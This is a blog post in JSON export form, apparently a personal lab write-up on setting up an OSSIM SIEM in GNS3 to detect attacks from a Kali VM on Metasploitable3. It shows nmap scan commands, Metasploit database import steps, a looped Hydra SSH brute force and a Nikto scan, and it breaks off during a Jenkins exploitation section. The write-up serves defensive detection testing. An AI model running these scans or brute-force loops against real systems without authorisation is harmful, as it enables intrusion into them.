{"id":4359,"date":"2021-10-12T22:47:48","date_gmt":"2021-10-12T14:47:48","guid":{"rendered":"http:\/\/mayanknauni.com\/?p=4359"},"modified":"2021-10-12T23:02:12","modified_gmt":"2021-10-12T15:02:12","slug":"security-ops-centre","status":"publish","type":"post","link":"https:\/\/mayanknauni.com\/?p=4359","title":{"rendered":"Security Ops Centre"},"content":{"rendered":"<h5><strong><em>Disclaimer:- This note was written by me ( Mayank Nauni)\u00a0in my personal capacity. The opinions expressed in this article are solely my own and do not reflect the view of my employer or my preference towards any of the OEMs.<\/em><\/strong><\/h5>\n<h1><a name=\"_Toc80823564\"><\/a>Introduction<\/h1>\n<p>The recent rise in cyber-attacks, together with tighter security regulations required from organizations, are making SOC (Security Operations Centre) a standard security approach which is being adopted by an increasing amount of organizations. SOC is more of the physical aspect and the technology is mostly called SIEM, which in effect is a security system comprised of multiple monitoring and analysis components meant to help organizations detect threats and mitigate them. SIEM is not a single tool or application but a set of different building blocks that all constitute part of a system. There is no standard SIEM protocol or established methodology, but most SIEM systems will comprise of elements such as aggregation of logs from various sources, normalization of those logs in a common format, then correlating events to connect the dots and detect attacks and finally visualize the data in dashboards for easy viewing by analysts. This project involves the creation of an internal network with some benign clients and servers with an external malicious attacker(s) launching different types of attack. The network can either be done through either connected VMs or Mininet or some other network virtualization tool. The goal is to use an open-source SIEM in the internal network to detect the attacks.<\/p>\n<p>A Security Information Manager is a tool that correlates information producing a higher confidence level for when an attack occurs. In the open source community, various tools have been created to monitor different aspects of security. OSSIM combines the data from these tools correlating it to a higher confidence when an attack occurs, or a host has been compromised and uses the data to determine the health of our network. It integrates Host Intrusion Detection Systems (HIDS) with Network Intrusion Detection Systems (NIDS) to do this.<\/p>\n<p>&nbsp;<\/p>\n<h2><a name=\"_Toc80823565\"><\/a>Lab Setup and Topology<\/h2>\n<p>The network topology is set up using GNS3 Emulator as a tool to simulate a security operation centre\u2019s environment. The following are the devices and virtual machines (VM).<\/p>\n<ul>\n<li>Switch (Gateway) Based on Cisco IOS image (12.4) \u2013 10.0.2.1<\/li>\n<li>Kali Attacker VM \u2013 2021.2 release \u2013 10.0.2.15<\/li>\n<li>Metasploitable3 VM (Based on Win2008) \u2013 10.0.2.2<\/li>\n<li>OSSIM SIEM VM (Alien Vault 10.0.2.30) \u2013 10.0.2.30<\/li>\n<li>GNS3 Version 2.2<\/li>\n<li>VirtualBox 6.1<\/li>\n<\/ul>\n<h3><a name=\"_Toc80823566\"><\/a>Topology Brief<\/h3>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-4361 size-full\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/Lab-Topology.jpg?resize=768%2C825&#038;ssl=1\" alt=\"\" width=\"768\" height=\"825\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/Lab-Topology.jpg?w=768&amp;ssl=1 768w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/Lab-Topology.jpg?resize=279%2C300&amp;ssl=1 279w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/p>\n<p>The topology has been created on GN3 network emulator which uses real IOS image for Cisco Switch (12.4 version); the Kali VM (2021.2 Release) and Metasploitable3 VM are created on VirtualBox and VirtualBox is integrated with GNS3, the VMs are connected to the switch using a generic driver (UDP tunnel).<\/p>\n<p>On the switch end, we have created a SPAN session to capture all traffic for the network port connected to the metasploitable3 VM and redirect it to the SIEM VM, OSSIM will use it as NDIPS.<\/p>\n<p>Below is the GN3 topology that we have created and used for this project:<\/p>\n<p>&nbsp;<\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-4362 size-full\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/GNS3.jpg?resize=789%2C549&#038;ssl=1\" alt=\"\" width=\"789\" height=\"549\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/GNS3.jpg?w=789&amp;ssl=1 789w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/GNS3.jpg?resize=300%2C209&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/GNS3.jpg?resize=768%2C534&amp;ssl=1 768w\" sizes=\"auto, (max-width: 789px) 100vw, 789px\" \/><\/p>\n<p>&nbsp;<\/p>\n<h2><a name=\"_Toc80823567\"><\/a>Strategy<\/h2>\n<p>&nbsp;<\/p>\n<p>We will try to create a setup using virtual-box and GNS3 a machine learning model for Wireshark packet-flow classification, we followed the below process to do the same:<\/p>\n<p>&nbsp;<\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-4364 size-full\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/Strategy.jpg?resize=840%2C588&#038;ssl=1\" alt=\"\" width=\"840\" height=\"588\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/Strategy.jpg?w=840&amp;ssl=1 840w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/Strategy.jpg?resize=300%2C210&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/Strategy.jpg?resize=768%2C538&amp;ssl=1 768w\" sizes=\"auto, (max-width: 840px) 100vw, 840px\" \/><\/p>\n<p>We will start with installation of the required VMs i.e. OSSIM, Metasploitable3 and Kali. \u00a0We have followed the specification as below, the additional promiscuous vNIC servers as the monitoring port, it will get traffic from the SPAN session on the Cisco switch.<\/p>\n<p>&nbsp;<\/p>\n<table width=\"495\">\n<tbody>\n<tr>\n<td width=\"109\">VM Name<\/td>\n<td width=\"64\">vCPU<\/td>\n<td width=\"221\">vNIC<\/td>\n<td width=\"36\">RAM<\/td>\n<td width=\"64\">HDD<\/td>\n<\/tr>\n<tr>\n<td width=\"109\">OSSIM VM<\/td>\n<td width=\"64\">4<\/td>\n<td width=\"221\">1 NIC x Generic Driver<br \/>\n1 NIC x Promiscuous Mode (Allow all)<\/td>\n<td width=\"36\">8192<\/td>\n<td width=\"64\">600<\/td>\n<\/tr>\n<tr>\n<td width=\"109\">Metasploitable3<\/td>\n<td width=\"64\">2<\/td>\n<td width=\"221\">1 NIC x Generic Driver<\/td>\n<td width=\"36\">8192<\/td>\n<td width=\"64\">100<\/td>\n<\/tr>\n<tr>\n<td width=\"109\">Kali VM<\/td>\n<td width=\"64\">4<\/td>\n<td width=\"221\">1 NIC x Generic Driver<\/td>\n<td width=\"36\">8192<\/td>\n<td width=\"64\">100<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2><a name=\"_Toc80823568\"><\/a>Introduction to OSSIM<\/h2>\n<h2><\/h2>\n<p>OSSIM is a distribution of open source products that are integrated to provide an infrastructure for security monitoring. OSSIM\u2019s objective is to provide a framework for centralizing, organising and improving detection and display for monitoring security events within an enterprise environment. This project will try to test the OSSIM\u2019s detection capabilities along with the capability to: &#8211;<\/p>\n<ul>\n<li>Correlate events<\/li>\n<li>Prioritise the critical events<\/li>\n<li>Perform a risk assessment<\/li>\n<\/ul>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-4365 size-full\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM.jpg?resize=864%2C465&#038;ssl=1\" alt=\"\" width=\"864\" height=\"465\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM.jpg?w=864&amp;ssl=1 864w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM.jpg?resize=300%2C161&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM.jpg?resize=768%2C413&amp;ssl=1 768w\" sizes=\"auto, (max-width: 864px) 100vw, 864px\" \/><\/p>\n<p>OSSIM consists of three different key components. The server, the framework, and the agent. Management is performed through a web-based interface and configuration is done through a series of configuration files. Multiple agents can be placed throughout the network.<\/p>\n<p>OSSIM gathers data using sensors. There are two primary ways to collect data.<\/p>\n<ul>\n<li>Using the OSSEC Agent (referred to HIDS in later section)<\/li>\n<li>Log data such as syslog<\/li>\n<li>Network monitoring on a network segment using a tool that monitors network traffic through a promiscuous interface.<\/li>\n<\/ul>\n<h2><a name=\"_Toc80823569\"><\/a>Getting environment ready<\/h2>\n<p>&nbsp;<\/p>\n<ul>\n<li>Create the three virtual machines and then immediately make an \u2018Initial Creation\u2019 snapshot<\/li>\n<li>Configure the hardware options for each virtual as per the hardware specification table above machine and create a snapshot.<\/li>\n<li>Start OSSIM and connect the installation ISO when prompted. We configure the required IP address is configured (10.0.2.30), set the correct time zone (SGT +8)<\/li>\n<li>If the installation hangs on installing the base system, give it some time. If this persists, check that the VM have a minimum of 4 CPUs.<\/li>\n<li>Do not attempt to perform two VM operating system installations at once. Do not have any other VMs or unnecessary programs running during the OSSIM installation.<\/li>\n<li>Install the Metasploitable3 and Kali VMs with all default settings. Make sure to choose the correct time zone i.e. SGT +8.<\/li>\n<li>We boot the Kali VM and Metasploitable VMs and configure static IP addresses as shown in the lab topology above.<\/li>\n<\/ul>\n<p>On the Cisco switch, below lines of code are inserted to configure a SPAN session i.e. mirror traffic of Metasploitable3 to the OSSIM\u2019s network monitoring port: &#8211;<\/p>\n<p><em>monitor session 1 source interface Fa1\/1 , Fa1\/4<\/em><\/p>\n<p><em>monitor session 1 destination interface Fa1\/3<\/em><\/p>\n<p>The Cisco switch also acts as NTP server to synchronise time for this isolated setup. The time is setup in +8 GMT, Singapore Time.<\/p>\n<h2><a name=\"_Toc80823570\"><\/a>OSSIM Configuration<\/h2>\n<p><strong>\u00a0<\/strong><\/p>\n<ul>\n<li>Once installation has been completed, we will take a snapshot.<\/li>\n<li>When the preview pane for OSSIM shows the below terminal, the web UI can be accessed at the IP address assigned 10.0.2.30 to the OSSIM box using the Kali VM.<\/li>\n<\/ul>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-4366 size-full\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM1.jpg?resize=837%2C348&#038;ssl=1\" alt=\"\" width=\"837\" height=\"348\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM1.jpg?w=837&amp;ssl=1 837w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM1.jpg?resize=300%2C125&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM1.jpg?resize=768%2C319&amp;ssl=1 768w\" sizes=\"auto, (max-width: 837px) 100vw, 837px\" \/><\/p>\n<ul>\n<li>Login to the OSSIM Web UI and start the Getting Started Wizard.<\/li>\n<li>On Network Interfaces, click Next, we have two interfaces, one for monitoring and one for management.<\/li>\n<li>On Asset Discovery, ensure that all VMs i.e. Kali and Metasploitable3 are displayed.<\/li>\n<li>We will deploy HIDS, an agent for Windows based Metasploitable3<\/li>\n<li>We will validate configuration of OSSIM now, starting with sensor configuration, we have assigned ethernet0 for management purpose and ethernet1 will be performing network monitoring: &#8211;<\/li>\n<\/ul>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-4367 size-full\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM3.jpg?resize=813%2C510&#038;ssl=1\" alt=\"\" width=\"813\" height=\"510\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM3.jpg?w=813&amp;ssl=1 813w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM3.jpg?resize=300%2C188&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM3.jpg?resize=768%2C482&amp;ssl=1 768w\" sizes=\"auto, (max-width: 813px) 100vw, 813px\" \/><\/p>\n<ul>\n<li>We will now go to Environment -&gt; Detection -&gt; Agents to validate if Metasploitable Agent is installed and active: &#8211;<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-4368 size-full\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM5.jpg?resize=861%2C339&#038;ssl=1\" alt=\"\" width=\"861\" height=\"339\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM5.jpg?w=861&amp;ssl=1 861w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM5.jpg?resize=300%2C118&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM5.jpg?resize=768%2C302&amp;ssl=1 768w\" sizes=\"auto, (max-width: 861px) 100vw, 861px\" \/><\/p>\n<p>We can conclude that the base setup is ready.<\/p>\n<p>&nbsp;<\/p>\n<p><strong>Adding Asset <\/strong><\/p>\n<p>Let us understand as how OSSIM calculates the asset value and risk value. OSSIM uses asset values assigned to the systems combined with a reliability and priority value from the received events to calculate risk. There are three ways that a host receives an asset value: it is given one, through the asset value of the network on which it resides, or it doesn\u2019t have an assigned asset value. In turn, this host asset value is used to calculate risk when an event is received. In the section below, I will explain the priority and risk values.<\/p>\n<p>&nbsp;<\/p>\n<p><strong>Creating a host asset value<\/strong><\/p>\n<p>Asset values were covered in the previous section. For a host you can view its value under policy hosts. This asset value ranges from 1 to 5. 1 signifies the host doesn\u2019t have much value, 5 is the highest value of importance one can give a host. Risk is calculated with the below formula:<\/p>\n<p><em>risk = asset * (reliability * priority \/ 25)<\/em><\/p>\n<p>Below is a screen shot displaying the data for the host named metasploit3. It has an IP address of 10.0.2.2 and highest asset value of 5.<\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-4369 size-full\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM6.jpg?resize=636%2C591&#038;ssl=1\" alt=\"\" width=\"636\" height=\"591\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM6.jpg?w=636&amp;ssl=1 636w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM6.jpg?resize=300%2C279&amp;ssl=1 300w\" sizes=\"auto, (max-width: 636px) 100vw, 636px\" \/><\/p>\n<p><strong>\u00a0<\/strong><strong>\u00a0<\/strong><strong>\u00a0<\/strong><\/p>\n<h2><a name=\"_Toc80823571\"><\/a>Investigating the Dashboard<\/h2>\n<p>The OSSIM dashboard is very intuitive and has a plethora of information, the snapshot of Executive dashboard is below, it provides a quick insight on: &#8211;<\/p>\n<ol>\n<li>Security Events: Top 5 Alarms<\/li>\n<li>SIEM: Top 10 event Categories<\/li>\n<li>SIEM vs Logger Events<\/li>\n<li>Top 10 Hosts with multiple events<\/li>\n<li>SIEM Events by Sensor \/ Data Source (tells us which sensor has been sending majority of events HIDS is agent installed on Metasploitable3 and NIDS is the network monitoring interface captured data)<\/li>\n<\/ol>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-4370 size-full\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM7.jpg?resize=807%2C474&#038;ssl=1\" alt=\"\" width=\"807\" height=\"474\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM7.jpg?w=807&amp;ssl=1 807w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM7.jpg?resize=300%2C176&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM7.jpg?resize=768%2C451&amp;ssl=1 768w\" sizes=\"auto, (max-width: 807px) 100vw, 807px\" \/><\/p>\n<p>We can see some data on the dashboard already, as I\u2019ve tried a couple of attacks on Metasploitable which are reflecting here.<\/p>\n<h2><a name=\"_Toc80823572\"><\/a>Attack Details<\/h2>\n<p>&nbsp;<\/p>\n<p><strong>Establishing the attack surface<\/strong><\/p>\n<p>We will run a nmap port scan which queries all available ports (-p 1-65535), includes service version detection (-sV) and saves the results to an XML file type with the name metasploitable3.xml. The purpose of saving the nmap port scan is to import these results into the Metasploit Framework. To achieve this, we need to create a database. Initialize the Metasploit Framework database using the following commands:<\/p>\n<ul>\n<li>nmap -sV -Pn -T4 -p 1-65535 -oX metasploitable3.xml 10.0.2.2<\/li>\n<li>msfdb init<\/li>\n<li>sudo systemctl start postgresql<\/li>\n<li>msfconsole<\/li>\n<li>db_import metasploitable3.xml<\/li>\n<li>services<\/li>\n<\/ul>\n<p><em>services<\/em> command on metasploitable will provide us an overview of all available services on the victim machine and relevant attacks will be carried on these services in later sections.<\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-4371 size-full\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/metasploit.jpg?resize=807%2C582&#038;ssl=1\" alt=\"\" width=\"807\" height=\"582\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/metasploit.jpg?w=807&amp;ssl=1 807w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/metasploit.jpg?resize=300%2C216&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/metasploit.jpg?resize=768%2C554&amp;ssl=1 768w\" sizes=\"auto, (max-width: 807px) 100vw, 807px\" \/><\/p>\n<p>&nbsp;<\/p>\n<p>In order to validate the functionality of our SIEM, we will implement the below four kinds of attacks and see if OSSIM is able to detect them:<\/p>\n<ul>\n<li>Brute force<\/li>\n<li>Probe<\/li>\n<li>ShellShock (using Nikto)<\/li>\n<li>Attempting to exploit Jenkins<\/li>\n<li>Attempting to initiate remote shell<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<p><strong>Directives (Customised Rules)<\/strong><\/p>\n<ul>\n<li>ShellShock \u2013 CVE-2014-6271<\/li>\n<li>NMAP<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<p>In order to capture alerts for the attack, we had create a couple of directives\u00a0 in which we have correct conditions defined for detecting an attack, the first condition is that either HIDS ( OSSEC agent) or NIDS ( Port Mirroring ) should be able to capture the traffic or meet the condition.<\/p>\n<p>We created a custom directive to detect a NMAP and ShellShock. Many connections from a single host (possibly with bad reputation) to the destination server on port of ShellShock (and multiport for NMAP) may indicate such an attack. We can check NIDS events for connections to the victim server and trigger an alarm after the correlation engine detects that the number of connections is dangerously high.<\/p>\n<p>The four correlation rules in the NMAP directive below check for the number of connections to the server using a NIDS plugin. Every time a rule in the correlation directive matches an event, the reliability of the directive event increases, thus increasing the risk of the event.<\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-4372 size-full\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM8.jpg?resize=786%2C249&#038;ssl=1\" alt=\"\" width=\"786\" height=\"249\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM8.jpg?w=786&amp;ssl=1 786w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM8.jpg?resize=300%2C95&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM8.jpg?resize=768%2C243&amp;ssl=1 768w\" sizes=\"auto, (max-width: 786px) 100vw, 786px\" \/><\/p>\n<h3><a name=\"_Toc80823573\"><\/a>Nmap Probe<\/h3>\n<p>We used the below-mentioned python code to initiate a probe on Metasploitable3<\/p>\n<p>Command: <em>nmap -sC -sV -oA project 10.0.2.2<\/em><\/p>\n<p>&nbsp;<\/p>\n<p>I could see the directive being triggered by the nmap attempts.<\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-4373 size-full\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM9.jpg?resize=819%2C450&#038;ssl=1\" alt=\"\" width=\"819\" height=\"450\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM9.jpg?w=819&amp;ssl=1 819w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM9.jpg?resize=300%2C165&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM9.jpg?resize=768%2C422&amp;ssl=1 768w\" sizes=\"auto, (max-width: 819px) 100vw, 819px\" \/><\/p>\n<p>On the Analysis -&gt; Alarm page I could see this alert being recorded as well:<\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-4374 size-full\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM10.jpg?resize=819%2C537&#038;ssl=1\" alt=\"\" width=\"819\" height=\"537\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM10.jpg?w=819&amp;ssl=1 819w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM10.jpg?resize=300%2C197&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM10.jpg?resize=768%2C504&amp;ssl=1 768w\" sizes=\"auto, (max-width: 819px) 100vw, 819px\" \/><\/p>\n<p>By clicking the alarm, we can see more details about it such as the protocol , the data source that reported it etc.<\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-4375 size-full\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM11.jpg?resize=816%2C537&#038;ssl=1\" alt=\"\" width=\"816\" height=\"537\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM11.jpg?w=816&amp;ssl=1 816w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM11.jpg?resize=300%2C197&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM11.jpg?resize=768%2C505&amp;ssl=1 768w\" sizes=\"auto, (max-width: 816px) 100vw, 816px\" \/><\/p>\n<p>&nbsp;<\/p>\n<h3><a name=\"_Toc80823574\"><\/a>Bruteforce and Packet Capture<\/h3>\n<p>We used Hydra to launch a brute-force attack on port 22 by SSH login attempts<\/p>\n<p>Command: <em>for i in {1..100}; do hydra -l root -p admin 10.0.2.2 -t 4 ssh;done<\/em><\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-4376 size-full\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/hydra.jpg?resize=792%2C339&#038;ssl=1\" alt=\"\" width=\"792\" height=\"339\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/hydra.jpg?w=792&amp;ssl=1 792w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/hydra.jpg?resize=300%2C128&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/hydra.jpg?resize=768%2C329&amp;ssl=1 768w\" sizes=\"auto, (max-width: 792px) 100vw, 792px\" \/><\/p>\n<p>As seen in the snapshot below, OSSIM was able to detect the bruteforce attempt and report it.<\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-4377 size-full\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM12.jpg?resize=801%2C489&#038;ssl=1\" alt=\"\" width=\"801\" height=\"489\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM12.jpg?w=801&amp;ssl=1 801w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM12.jpg?resize=300%2C183&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM12.jpg?resize=768%2C469&amp;ssl=1 768w\" sizes=\"auto, (max-width: 801px) 100vw, 801px\" \/><\/p>\n<p>The alert detail shows more detail such the destination, the source shows as metasploitable as well as it is reported by local HIDS running on the victim.<\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-4378 size-full\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM13.jpg?resize=801%2C462&#038;ssl=1\" alt=\"\" width=\"801\" height=\"462\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM13.jpg?w=801&amp;ssl=1 801w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM13.jpg?resize=300%2C173&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM13.jpg?resize=768%2C443&amp;ssl=1 768w\" sizes=\"auto, (max-width: 801px) 100vw, 801px\" \/><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<h3><a name=\"_Toc80823575\"><\/a>ShellShock<\/h3>\n<p>We used the below-mentioned command to emulate a ShellShock (CVE-2014-6271 on Metasploitable3, port 8585 running WordPress.<\/p>\n<p>Command: <em>Nikto -h <\/em><a href=\"http:\/\/10.0.2.2:8585\/wordpress\/\"><em>http:\/\/10.0.2.2:8585\/wordpress\/<\/em><\/a><\/p>\n<p><em> <img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-4379 size-full\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/nikto.jpg?resize=807%2C243&#038;ssl=1\" alt=\"\" width=\"807\" height=\"243\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/nikto.jpg?w=807&amp;ssl=1 807w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/nikto.jpg?resize=300%2C90&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/nikto.jpg?resize=768%2C231&amp;ssl=1 768w\" sizes=\"auto, (max-width: 807px) 100vw, 807px\" \/><\/em><\/p>\n<p>OSSIM was able to detect and flag out this possible attack by using the customised directive I had created.<\/p>\n<p>&nbsp;<\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-4380 size-full\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM14.jpg?resize=798%2C468&#038;ssl=1\" alt=\"\" width=\"798\" height=\"468\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM14.jpg?w=798&amp;ssl=1 798w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM14.jpg?resize=300%2C176&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM14.jpg?resize=768%2C450&amp;ssl=1 768w\" sizes=\"auto, (max-width: 798px) 100vw, 798px\" \/><\/p>\n<p>&nbsp;<\/p>\n<h3><a name=\"_Toc80823576\"><\/a>Application Exploitation (Jenkins)<\/h3>\n<p>&nbsp;<\/p>\n<p>We used the below-mentioned strategy to attack the Jenkins application running on the port 8484<\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-4381 size-full\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/Jenkins.jpg?resize=807%2C306&#038;ssl=1\" alt=\"\" width=\"807\" height=\"306\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/Jenkins.jpg?w=807&amp;ssl=1 807w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/Jenkins.jpg?resize=300%2C114&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/Jenkins.jpg?resize=768%2C291&amp;ssl=1 768w\" sizes=\"auto, (max-width: 807px) 100vw, 